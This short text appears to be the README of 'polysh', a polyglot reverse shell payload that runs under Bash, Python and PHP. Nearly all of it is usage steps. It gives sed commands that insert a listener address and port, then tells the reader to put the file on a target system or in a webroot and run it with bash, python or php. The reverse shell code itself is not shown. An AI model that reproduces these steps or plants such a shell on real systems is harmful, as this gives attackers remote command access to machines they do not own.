Polymorph reverse shell payload for Bash, Python, and PHP.
Replace {{{ADDR}}} and {{{PORT}}} according to your listener:
{{{ADDR}}}
{{{PORT}}}
sed -i "s/{{{ADDR}}}/10.0.0.42/g" polysh
sed -i "s/{{{PORT}}}/1337/g" polysh
After that, bring it onto your target system and either bash polysh, python polysh or php polysh it - or bring it into webroot and call it.
bash polysh
python polysh
php polysh
Reverse shells taken from revshells.com, slightly modified for the poly magic.